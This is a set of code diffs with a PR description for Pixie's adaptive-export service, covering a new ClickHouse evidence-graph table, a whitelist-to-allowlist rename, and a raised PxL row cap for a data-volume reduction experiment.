--- a/src/vizier/services/adaptive_export/internal/clickhouse/ddl.go
+++ b/src/vizier/services/adaptive_export/internal/clickhouse/ddl.go
@@ -64,6 +64,9 @@ var KnownTables = []string{
 	// operator-owned per-pull write-fidelity instrument (ADAPTIVE_RECONCILE).
 	// NOT a pixie table — absent from PixieTables().
 	"ae_reconcile",
+	// operator-owned dx evidence-graph edge list (read by the Pixie
+	// dx_evidence_graph UI via clickhouse_dsn). NOT a pixie table.
+	"dx_attack_graph",
 }
 
 // ErrUnknownTable is returned by DDL / Columns when asked for a table

--- a/src/vizier/services/adaptive_export/internal/clickhouse/schema.sql
+++ b/src/vizier/services/adaptive_export/internal/clickhouse/schema.sql
@@ -505,13 +505,18 @@ CREATE TABLE IF NOT EXISTS forensic_db.dx_attack_graph (
     responder_service String,
     requestor_ip      String,
     responder_ip      String,
-    weight            UInt16,
-    max_severity      UInt8,
-    confidence        Float32,
+    -- Int64/Float64 ONLY for the numeric columns: Pixie's clickhouse_dsn type
+    -- mapper reads UInt8 as BOOLEAN and does not handle UInt16/UInt32/Float32,
+    -- so those fail px marshaling with "Column[N] given incorrect type". Int64
+    -- + Float64 map cleanly (INT64→Int64, FLOAT64→Float64). event_time stays
+    -- UInt64 (same as kubescape_logs, which px reads fine).
+    weight            Int64,
+    max_severity      Int64,
+    confidence        Float64,
     edge_kind         String,
     `condition`       String,
     criteria          String,
-    num_findings      UInt32
+    num_findings      Int64
 ) ENGINE = MergeTree()
   ORDER BY (event_time, hostname)
   PARTITION BY toYYYYMM(fromUnixTimestamp64Nano(event_time))

--- a/src/vizier/services/adaptive_export/internal/clickhouse/schema.sql
+++ b/src/vizier/services/adaptive_export/internal/clickhouse/schema.sql
@@ -483,3 +483,37 @@ CREATE TABLE IF NOT EXISTS forensic_db.ae_reconcile (
 ) ENGINE = MergeTree
   PARTITION BY toYYYYMMDD(ts)
   ORDER BY (table_name, ts);
+
+-- dx_attack_graph — dx evidence-graph edge list: one row per directed hop of an
+-- investigation (delivery/egress/execution/exfil/pivot), read by the Pixie
+-- dx_evidence_graph UI via px.DataFrame(clickhouse_dsn=...). Operator-owned
+-- (dx emits the edges, AE persists them); NOT a pixie socket_tracer table.
+--
+-- event_time (unix NANOSECONDS) + hostname are REQUIRED: Pixie's clickhouse_dsn
+-- query template hardcodes `WHERE event_time >= ... AND hostname = ... ORDER BY
+-- event_time` — a table without those columns fails with "Unknown identifier
+-- event_time". Same convention as kubescape_logs. event_time is nanos, so the
+-- partition/TTL use fromUnixTimestamp64Nano (toDateTime would read ns as seconds
+-- → year ~58e9 → broken partitions; see the soc#225 fix).
+CREATE TABLE IF NOT EXISTS forensic_db.dx_attack_graph (
+    investigation_id  String,
+    event_time        UInt64,
+    hostname          String,
+    requestor_pod     String,
+    responder_pod     String,
+    requestor_service String,
+    responder_service String,
+    requestor_ip      String,
+    responder_ip      String,
+    weight            UInt16,
+    max_severity      UInt8,
+    confidence        Float32,
+    edge_kind         String,
+    `condition`       String,
+    criteria          String,
+    num_findings      UInt32
+) ENGINE = MergeTree()
+  ORDER BY (event_time, hostname)
+  PARTITION BY toYYYYMM(fromUnixTimestamp64Nano(event_time))
+  TTL toDateTime(fromUnixTimestamp64Nano(event_time)) + INTERVAL 30 DAY DELETE
+  SETTINGS index_granularity = 8192;

--- a/src/vizier/services/adaptive_export/internal/streaming/filter.go
+++ b/src/vizier/services/adaptive_export/internal/streaming/filter.go
@@ -15,7 +15,7 @@
 // SPDX-License-Identifier: Apache-2.0
 
 // Package streaming implements the rev-3 push-flow: long-running
-// PxL submissions per pixie table, with a pod whitelist derived from
+// PxL submissions per pixie table, with a pod allowlist derived from
 // the ActiveSet. See .local/adaptive-write-rev3-plan.md for the full
 // architectural rationale.
 package streaming
@@ -30,18 +30,18 @@ import (
 	"px.dev/pixie/src/vizier/services/adaptive_export/internal/activeset"
 )
 
-// FilterMode selects how the embedded PxL whitelist is constructed.
+// FilterMode selects how the embedded PxL allowlist is constructed.
 type FilterMode int
 
 const (
-	// FilterModeWhitelist embeds an explicit pod list in the PxL
+	// FilterModeAllowlist embeds an explicit pod list in the PxL
 	// `df = df[df.pod.in_([...])]` clause. Optimal while the set is
 	// small.
-	FilterModeWhitelist FilterMode = iota
+	FilterModeAllowlist FilterMode = iota
 
 	// FilterModeUnfiltered emits the script WITHOUT a pod filter —
 	// the stream returns ALL pods on this node. Used when the active
-	// set exceeds MaxWhitelistSize: the PxL script-size limit + parse
+	// set exceeds MaxAllowlistSize: the PxL script-size limit + parse
 	// cost would dominate; we prefer to pull everything and filter
 	// in the operator's CH writer. Memory-speed filtering beats
 	// linear-in-N PxL parse cost.
@@ -51,8 +51,8 @@ const (
 // String for log output.
 func (m FilterMode) String() string {
 	switch m {
-	case FilterModeWhitelist:
-		return "whitelist"
+	case FilterModeAllowlist:
+		return "allowlist"
 	case FilterModeUnfiltered:
 		return "unfiltered"
 	default:
@@ -64,7 +64,7 @@ func (m FilterMode) String() string {
 // produce one PxL submission.
 type Filter struct {
 	Mode    FilterMode
-	Pods    []activeset.Key // populated iff Mode == Whitelist
+	Pods    []activeset.Key // populated iff Mode == Allowlist
 	Version uint64          // ActiveSet version this filter was derived from
 }
 
@@ -76,10 +76,10 @@ type UpdaterConfig struct {
 	// TableScanner. 0 → 1 second default.
 	Debounce time.Duration
 
-	// MaxWhitelistSize is the threshold at which we switch to
+	// MaxAllowlistSize is the threshold at which we switch to
 	// FilterModeUnfiltered. 0 → 500 default. -1 disables the cap
-	// (whitelist always; PxL parse cost is yours to own).
-	MaxWhitelistSize int
+	// (allowlist always; PxL parse cost is yours to own).
+	MaxAllowlistSize int
 
 	// SubscribeBuffer is the per-subscriber delta buffer size on the
 	// underlying ActiveSet subscription. 0 → 32 default.
@@ -90,8 +90,8 @@ func (c UpdaterConfig) defaulted() UpdaterConfig {
 	if c.Debounce <= 0 {
 		c.Debounce = 1 * time.Second
 	}
-	if c.MaxWhitelistSize == 0 {
-		c.MaxWhitelistSize = 500
+	if c.MaxAllowlistSize == 0 {
+		c.MaxAllowlistSize = 500
 	}
 	if c.SubscribeBuffer <= 0 {
 		c.SubscribeBuffer = 32
@@ -205,19 +205,19 @@ func (u *FilterUpdater) Run(ctx context.Context) {
 				"mode":    f.Mode,
 				"pods":    len(f.Pods),
 				"version": f.Version,
-			}).Debug("streaming.FilterUpdater: emitted filter")
+			}).Info("streaming.FilterUpdater: emitted filter")
 		}
 	}
 }
 
 // computeFilter snapshots the ActiveSet and decides whether to embed
-// a whitelist or fall back to unfiltered mode based on size.
+// an allowlist or fall back to unfiltered mode based on size.
 func (u *FilterUpdater) computeFilter() Filter {
 	keys, version := u.set.Snapshot()
-	if u.cfg.MaxWhitelistSize > 0 && len(keys) > u.cfg.MaxWhitelistSize {
+	if u.cfg.MaxAllowlistSize > 0 && len(keys) > u.cfg.MaxAllowlistSize {
 		return Filter{Mode: FilterModeUnfiltered, Version: version}
 	}
-	return Filter{Mode: FilterModeWhitelist, Pods: keys, Version: version}
+	return Filter{Mode: FilterModeAllowlist, Pods: keys, Version: version}
 }
 
 // broadcast non-blockingly delivers to every subscriber. Subscribers

--- a/src/vizier/services/adaptive_export/internal/streaming/filter_test.go
+++ b/src/vizier/services/adaptive_export/internal/streaming/filter_test.go
@@ -67,7 +67,7 @@ func TestFilterUpdater_FallsBackToUnfilteredOnSizeCap(t *testing.T) {
 	set := activeset.New()
 	u := NewUpdater(set, UpdaterConfig{
 		Debounce:         20 * time.Millisecond,
-		MaxWhitelistSize: 3,
+		MaxAllowlistSize: 3,
 	})
 	ctx, cancel := context.WithCancel(context.Background())
 	defer cancel()
@@ -88,13 +88,13 @@ func TestFilterUpdater_FallsBackToUnfilteredOnSizeCap(t *testing.T) {
 	}
 }
 
-// TestFilterUpdater_CapBoundary_AtLimit — exactly MaxWhitelistSize
-// pods MUST stay in whitelist mode (not flip to unfiltered).
+// TestFilterUpdater_CapBoundary_AtLimit — exactly MaxAllowlistSize
+// pods MUST stay in allowlist mode (not flip to unfiltered).
 func TestFilterUpdater_CapBoundary_AtLimit(t *testing.T) {
 	set := activeset.New()
 	u := NewUpdater(set, UpdaterConfig{
 		Debounce:         10 * time.Millisecond,
-		MaxWhitelistSize: 3,
+		MaxAllowlistSize: 3,
 	})
 	ctx, cancel := context.WithCancel(context.Background())
 	defer cancel()
@@ -105,11 +105,11 @@ func TestFilterUpdater_CapBoundary_AtLimit(t *testing.T) {
 		set.Upsert(activeset.Key{Pod: string(rune('a' + i))}, time.Now().Add(time.Minute))
 	}
 	f := waitForFilter(t, ch, 300*time.Millisecond)
-	if f.Mode != FilterModeWhitelist {
-		t.Fatalf("at exactly cap=3, expected whitelist, got %v", f.Mode)
+	if f.Mode != FilterModeAllowlist {
+		t.Fatalf("at exactly cap=3, expected allowlist, got %v", f.Mode)
 	}
 	if len(f.Pods) != 3 {
-		t.Fatalf("expected 3 pods in whitelist, got %d", len(f.Pods))
+		t.Fatalf("expected 3 pods in allowlist, got %d", len(f.Pods))
 	}
 }
 
@@ -119,7 +119,7 @@ func TestFilterUpdater_CapBoundary_OneOverLimit(t *testing.T) {
 	set := activeset.New()
 	u := NewUpdater(set, UpdaterConfig{
 		Debounce:         10 * time.Millisecond,
-		MaxWhitelistSize: 3,
+		MaxAllowlistSize: 3,
 	})
 	ctx, cancel := context.WithCancel(context.Background())
 	defer cancel()
@@ -137,13 +137,13 @@ func TestFilterUpdater_CapBoundary_OneOverLimit(t *testing.T) {
 
 // TestFilterUpdater_CapBoundary_RecoversAfterShrink — going from
 // unfiltered (set was huge) back to a small set MUST switch back to
-// whitelist mode. Without this, a transient burst that hit the cap
+// allowlist mode. Without this, a transient burst that hit the cap
 // would force unfiltered mode forever.
 func TestFilterUpdater_CapBoundary_RecoversAfterShrink(t *testing.T) {
 	set := activeset.New()
 	u := NewUpdater(set, UpdaterConfig{
 		Debounce:         10 * time.Millisecond,
-		MaxWhitelistSize: 3,
+		MaxAllowlistSize: 3,
 	})
 	ctx, cancel := context.WithCancel(context.Background())
 	defer cancel()
@@ -164,7 +164,7 @@ func TestFilterUpdater_CapBoundary_RecoversAfterShrink(t *testing.T) {
 		set.Remove(activeset.Key{Pod: string(rune('a' + i))})
 	}
 	// Drain any intermediate filters; verify the LATEST emission is
-	// back to whitelist mode.
+	// back to allowlist mode.
 	deadline := time.Now().Add(500 * time.Millisecond)
 	last := f
 	for time.Now().Before(deadline) {
@@ -172,21 +172,21 @@ func TestFilterUpdater_CapBoundary_RecoversAfterShrink(t *testing.T) {
 		case last = <-ch:
 		case <-time.After(100 * time.Millisecond):
 		}
-		if last.Mode == FilterModeWhitelist {
+		if last.Mode == FilterModeAllowlist {
 			return // recovered
 		}
 	}
-	t.Fatalf("did not recover to whitelist mode after shrink; last mode=%v pods=%d",
+	t.Fatalf("did not recover to allowlist mode after shrink; last mode=%v pods=%d",
 		last.Mode, len(last.Pods))
 }
 
-// TestFilterUpdater_CapDisabled_AllowsAnySize — when MaxWhitelistSize <= 0
-// the cap is disabled and even very large sets stay in whitelist mode.
+// TestFilterUpdater_CapDisabled_AllowsAnySize — when MaxAllowlistSize <= 0
+// the cap is disabled and even very large sets stay in allowlist mode.
 func TestFilterUpdater_CapDisabled_AllowsAnySize(t *testing.T) {
 	set := activeset.New()
 	u := NewUpdater(set, UpdaterConfig{
 		Debounce:         10 * time.Millisecond,
-		MaxWhitelistSize: -1, // explicit disable
+		MaxAllowlistSize: -1, // explicit disable
 	})
 	ctx, cancel := context.WithCancel(context.Background())
 	defer cancel()
@@ -197,8 +197,8 @@ func TestFilterUpdater_CapDisabled_AllowsAnySize(t *testing.T) {
 		set.Upsert(activeset.Key{Pod: string(rune('a'+i%26)) + string(rune('a'+i/26))}, time.Now().Add(time.Minute))
 	}
 	f := waitForFilter(t, ch, 300*time.Millisecond)
-	if f.Mode != FilterModeWhitelist {
-		t.Fatalf("with cap disabled (=-1), expected whitelist; got %v", f.Mode)
+	if f.Mode != FilterModeAllowlist {
+		t.Fatalf("with cap disabled (=-1), expected allowlist; got %v", f.Mode)
 	}
 }
 

--- a/src/vizier/services/adaptive_export/internal/streaming/integration_test.go
+++ b/src/vizier/services/adaptive_export/internal/streaming/integration_test.go
@@ -29,7 +29,7 @@ import (
 
 // recordingQuerier captures every PxL string + lets the test inject
 // a per-call row count. Useful for verifying that the PxL the scanner
-// emits actually carries the whitelist the test set up upstream.
+// emits actually carries the allowlist the test set up upstream.
 type recordingQuerier struct {
 	mu       sync.Mutex
 	queries  []string
@@ -81,19 +81,19 @@ func (w *countingWriter) count(table string) int64 {
 	return w.perTable[table]
 }
 
-// TestIntegration_NotifierToScannerWhitelistFlow — exercises the
+// TestIntegration_NotifierToScannerAllowlistFlow — exercises the
 // whole rev-3 pipeline minus pixie:
 //
 //	AttributionNotifier.Submit
 //	  → ActiveSet.Upsert
 //	    → FilterUpdater (debounce)
-//	      → TableScanner.buildPxL (whitelist embedded)
+//	      → TableScanner.buildPxL (allowlist embedded)
 //	        → recordingQuerier (verify PxL contains pod names)
 //	          → BatchWriter (verify rows reach sink)
 //
 // The whole chain runs against fake pixie + fake sink so we can
 // assert on PxL strings + row counts deterministically.
-func TestIntegration_NotifierToScannerWhitelistFlow(t *testing.T) {
+func TestIntegration_NotifierToScannerAllowlistFlow(t *testing.T) {
 	ctx, cancel := context.WithTimeout(context.Background(), 3*time.Second)
 	defer cancel()
 
@@ -103,7 +103,7 @@ func TestIntegration_NotifierToScannerWhitelistFlow(t *testing.T) {
 	updater := NewUpdater(set, UpdaterConfig{Debounce: 20 * time.Millisecond})
 	q := &recordingQuerier{
 		rowsFunc: func(pxl string) []map[string]any {
-			// Return 3 rows iff the whitelist contains "wantpod"; else 0.
+			// Return 3 rows iff the allowlist contains "wantpod"; else 0.
 			if strings.Contains(pxl, "wantpod") {
 				return []map[string]any{{"a": 1}, {"a": 2}, {"a": 3}}
 			}
@@ -184,10 +184,10 @@ func TestIntegration_EmptyActiveSetSkipsAllQueries(t *testing.T) {
 	}
 }
 
-// TestIntegration_PrunePropagatesToScannerWhitelist — when the
+// TestIntegration_PrunePropagatesToScannerAllowlist — when the
 // controller's prune fires, the scanner's next PxL must omit the
 // pruned pod.
-func TestIntegration_PrunePropagatesToScannerWhitelist(t *testing.T) {
+func TestIntegration_PrunePropagatesToScannerAllowlist(t *testing.T) {
 	ctx, cancel := context.WithTimeout(context.Background(), 2*time.Second)
 	defer cancel()
 
@@ -207,7 +207,7 @@ func TestIntegration_PrunePropagatesToScannerWhitelist(t *testing.T) {
 	go func() { defer wg.Done(); scanner.Run(ctx) }()
 
 	// Add a SECOND pod so the scanner keeps issuing queries after
-	// we Remove "soon-pruned" (else it'd just sit in empty-whitelist
+	// we Remove "soon-pruned" (else it'd just sit in empty-allowlist
 	// mode and we'd have no way to deterministically witness the
 	// filter change).
 	notif.Submit(activeset.Key{Pod: "soon-pruned"}, time.Now().Add(time.Minute))

--- a/src/vizier/services/adaptive_export/internal/streaming/scanner.go
+++ b/src/vizier/services/adaptive_export/internal/streaming/scanner.go
@@ -261,9 +261,18 @@ func (s *TableScanner) Run(ctx context.Context) {
 }
 
 // buildPxL renders the script for one query.
+// pxSetMaxRows raises Pixie's per-table result cap (default 10000) via the
+// query-broker's `#px:set` query flag, mirroring internal/pxl (queryfor.go /
+// compile.go). Without it the streaming/DX arm silently caps each pull at 10k
+// rows while the passthrough/ALL arm (which already emits this) does not — which
+// would UNDER-count DX and OVERSTATE the DX-vs-ALL volume reduction. Must be the
+// first line of the script (before `import px`).
+const pxSetMaxRows = "#px:set max_output_rows_per_table=1000000\n"
+
 func (s *TableScanner) buildPxL(f Filter) string {
 	relStart := "-" + strconv.FormatInt(int64(s.cfg.QueryWindow/time.Second), 10) + "s"
 	var b strings.Builder
+	b.WriteString(pxSetMaxRows)
 	b.WriteString("import px\n")
 	b.WriteString("df = px.DataFrame(table='" + s.cfg.Table + "', start_time='" + relStart + "')\n")
 	b.WriteString("df.namespace = px.upid_to_namespace(df.upid)\n")

--- a/src/vizier/services/adaptive_export/internal/streaming/scanner.go
+++ b/src/vizier/services/adaptive_export/internal/streaming/scanner.go
@@ -93,7 +93,7 @@ func (c ScannerConfig) defaulted() ScannerConfig {
 }
 
 // TableScanner runs ONE PxL submission per refresh cycle for ONE
-// pixie table, with a pod whitelist drawn from an upstream Filter
+// pixie table, with a pod allowlist drawn from an upstream Filter
 // channel. Output goes to a per-table BatchWriter.
 //
 // This is the rev-3 replacement for pushPixieRows' per-hash×per-table
@@ -128,8 +128,8 @@ func NewScanner(cfg ScannerConfig, querier Querier, writer *BatchWriter, filters
 //
 //  1. Wait for filter (initial) — block until first one arrives.
 //  2. Loop:
-//     - If filter has no pods AND mode == Whitelist: skip query
-//     entirely (the whole purpose: empty whitelist = no work).
+//     - If filter has no pods AND mode == Allowlist: skip query
+//     entirely (the whole purpose: empty allowlist = no work).
 //     - Else: build PxL, query, push rows to writer.
 //     - Sleep RefreshInterval OR until filter changes.
 //  3. Backoff on Querier errors.
@@ -159,9 +159,19 @@ func (s *TableScanner) Run(ctx context.Context) {
 			return
 		}
 
-		// Empty whitelist short-circuit: nothing to query.
-		if s.currentFilter.Mode == FilterModeWhitelist && len(s.currentFilter.Pods) == 0 {
+		// Empty allowlist short-circuit: nothing to query.
+		if s.currentFilter.Mode == FilterModeAllowlist && len(s.currentFilter.Pods) == 0 {
 			s.skipped.Add(1)
+			// Diagnostic: an empty allowlist means the ActiveSet has no
+			// members — i.e. nothing has been steered into this AE yet.
+			// Logged so an operator can tell "empty ActiveSet → skipping"
+			// apart from "queried but the broker returned 0 rows" (the
+			// latter logs "query completed rows=0"). Naturally rate-limited:
+			// we block on the next filter immediately after.
+			log.WithFields(log.Fields{
+				"table":   s.cfg.Table,
+				"version": s.currentFilter.Version,
+			}).Info("streaming.TableScanner: empty allowlist (ActiveSet has no steered pods) — skipping query until a filter with pods arrives")
 			// Wait for either: a new filter arrives, or ctx done.
 			select {
 			case <-ctx.Done():
@@ -258,8 +268,8 @@ func (s *TableScanner) buildPxL(f Filter) string {
 	b.WriteString("df = px.DataFrame(table='" + s.cfg.Table + "', start_time='" + relStart + "')\n")
 	b.WriteString("df.namespace = px.upid_to_namespace(df.upid)\n")
 	b.WriteString("df.pod = px.upid_to_pod_name(df.upid)\n")
-	if f.Mode == FilterModeWhitelist && len(f.Pods) > 0 {
-		// Whitelist clause. PxL syntax exploration (2026-05-17):
+	if f.Mode == FilterModeAllowlist && len(f.Pods) > 0 {
+		// Allowlist clause. PxL syntax exploration (2026-05-17):
 		//  - `or` between equalities → "Expected two arguments to 'or'"
 		//  - `|` between equalities → "Operator '|' not handled"
 		//  - `px.contains(s, p)` → SUBSTRING (not regex)

--- a/src/vizier/services/adaptive_export/internal/streaming/scanner_test.go
+++ b/src/vizier/services/adaptive_export/internal/streaming/scanner_test.go
@@ -85,11 +85,11 @@ func (f *fakeWriter) WritePixieRows(ctx context.Context, table string, rows []ma
 	return nil
 }
 
-func TestScanner_BuildsPxLWithWhitelistOR(t *testing.T) {
+func TestScanner_BuildsPxLWithAllowlistOR(t *testing.T) {
 	cfg := ScannerConfig{Table: "pgsql_events"}.defaulted()
 	s := &TableScanner{cfg: cfg}
 	f := Filter{
-		Mode: FilterModeWhitelist,
+		Mode: FilterModeAllowlist,
 		Pods: []activeset.Key{
 			{Namespace: "n1", Pod: "a"},
 			{Namespace: "n2", Pod: "b"},
@@ -113,7 +113,7 @@ func TestScanner_BuildsPxLWithWhitelistOR(t *testing.T) {
 	}
 }
 
-func TestScanner_UnfilteredModeOmitsWhitelist(t *testing.T) {
+func TestScanner_UnfilteredModeOmitsAllowlist(t *testing.T) {
 	cfg := ScannerConfig{Table: "http_events"}.defaulted()
 	s := &TableScanner{cfg: cfg}
 	f := Filter{Mode: FilterModeUnfiltered}
@@ -123,11 +123,11 @@ func TestScanner_UnfilteredModeOmitsWhitelist(t *testing.T) {
 	}
 }
 
-func TestScanner_EmptyWhitelistSkipsQuery(t *testing.T) {
+func TestScanner_EmptyAllowlistSkipsQuery(t *testing.T) {
 	q := &fakeQuerier{rows: nil}
 	w := NewBatchWriter("pgsql_events", &fakeWriter{}, WriterConfig{BatchEvery: time.Hour})
 	filtCh := make(chan Filter, 4)
-	filtCh <- Filter{Mode: FilterModeWhitelist, Pods: nil} // empty
+	filtCh <- Filter{Mode: FilterModeAllowlist, Pods: nil} // empty
 	cfg := ScannerConfig{Table: "pgsql_events", RefreshInterval: 100 * time.Millisecond}
 	sc := NewScanner(cfg, q, w, filtCh)
 	ctx, cancel := context.WithTimeout(context.Background(), 200*time.Millisecond)
@@ -136,7 +136,7 @@ func TestScanner_EmptyWhitelistSkipsQuery(t *testing.T) {
 	sc.Run(ctx)
 	st := sc.Stats()
 	if st.Queries != 0 {
-		t.Fatalf("expected 0 queries on empty whitelist, got %d", st.Queries)
+		t.Fatalf("expected 0 queries on empty allowlist, got %d", st.Queries)
 	}
 	if st.Skipped == 0 {
 		t.Fatalf("expected skipped > 0")
@@ -150,7 +150,7 @@ func TestScanner_BackoffOnRepeatedErrors(t *testing.T) {
 	q := &failingQuerier{err: errors.New("simulated broker outage")}
 	w := NewBatchWriter("pgsql_events", &fakeWriter{}, WriterConfig{BatchEvery: 50 * time.Millisecond})
 	filtCh := make(chan Filter, 4)
-	filtCh <- Filter{Mode: FilterModeWhitelist, Pods: []activeset.Key{{Pod: "p"}}}
+	filtCh <- Filter{Mode: FilterModeAllowlist, Pods: []activeset.Key{{Pod: "p"}}}
 	cfg := ScannerConfig{
 		Table:           "pgsql_events",
 		RefreshInterval: 100 * time.Second, // huge — backoff must dominate, not refresh
@@ -188,7 +188,7 @@ func TestScanner_BackoffResetsOnSuccess(t *testing.T) {
 	}
 	w := NewBatchWriter("pgsql_events", &fakeWriter{}, WriterConfig{BatchEvery: 1 * time.Hour})
 	filtCh := make(chan Filter, 4)
-	filtCh <- Filter{Mode: FilterModeWhitelist, Pods: []activeset.Key{{Pod: "p"}}}
+	filtCh <- Filter{Mode: FilterModeAllowlist, Pods: []activeset.Key{{Pod: "p"}}}
 	cfg := ScannerConfig{
 		Table:           "pgsql_events",
 		RefreshInterval: 10 * time.Millisecond,
@@ -223,7 +223,7 @@ func TestScanner_QueriesOnNonEmptyFilter(t *testing.T) {
 	fw := &fakeWriter{}
 	w := NewBatchWriter("pgsql_events", fw, WriterConfig{BatchEvery: 50 * time.Millisecond})
 	filtCh := make(chan Filter, 4)
-	filtCh <- Filter{Mode: FilterModeWhitelist, Pods: []activeset.Key{{Pod: "p"}}}
+	filtCh <- Filter{Mode: FilterModeAllowlist, Pods: []activeset.Key{{Pod: "p"}}}
 	cfg := ScannerConfig{Table: "pgsql_events", RefreshInterval: 50 * time.Millisecond, QueryTimeout: 1 * time.Second}
 	sc := NewScanner(cfg, q, w, filtCh)
 	ctx, cancel := context.WithTimeout(context.Background(), 300*time.Millisecond)

--- a/src/vizier/services/adaptive_export/internal/streaming/scanner_test.go
+++ b/src/vizier/services/adaptive_export/internal/streaming/scanner_test.go
@@ -96,6 +96,9 @@ func TestScanner_BuildsPxLWithAllowlistOR(t *testing.T) {
 		},
 	}
 	pxl := s.buildPxL(f)
+	if !strings.HasPrefix(pxl, "#px:set max_output_rows_per_table=1000000\n") {
+		t.Fatalf("pxl missing the #px:set cap flag (10k-cap fix); got:\n%s", pxl)
+	}
 	if !strings.Contains(pxl, "table='pgsql_events'") {
 		t.Fatalf("pxl missing table: %s", pxl)
 	}


### PR DESCRIPTION
Stacked on #53 (ae-prod). Continues the AE datavolume work: now that the F1 10k-cap fix is live-verified on aeprod11 (passthrough firehose captures the full window, 42,516 http rows/query, read==wrote), this PR measures the **datavolume reduction** of **DX-steered AE** (rev-3 streaming — AE writes only the pods DX steers into its activeSet over the control surface) **vs saving ALL data** (passthrough firehose).

### What
- New harness `src/e2e_test/adaptive_export_loadtest/harness/exp_dx_steering_reduction.sh`: two arms (ALL passthrough vs DX streaming), same fixed load, forensic_db active-part deltas (rows + on-disk bytes) per table; `reduction = 1 - DX/ALL`.
- Successor to `ae_vs_all.sh` (whose AE arm used the rev-2 controller gate + a stale malformed JNDI). This uses rev-3 DX streaming + the canonical resolvable JNDI FQDN so the chain fires and DX classifies.

### Measurement (filled from the live run on the rig)
- ALL bytes/table, DX bytes/table, reduction % per table + total — to follow.
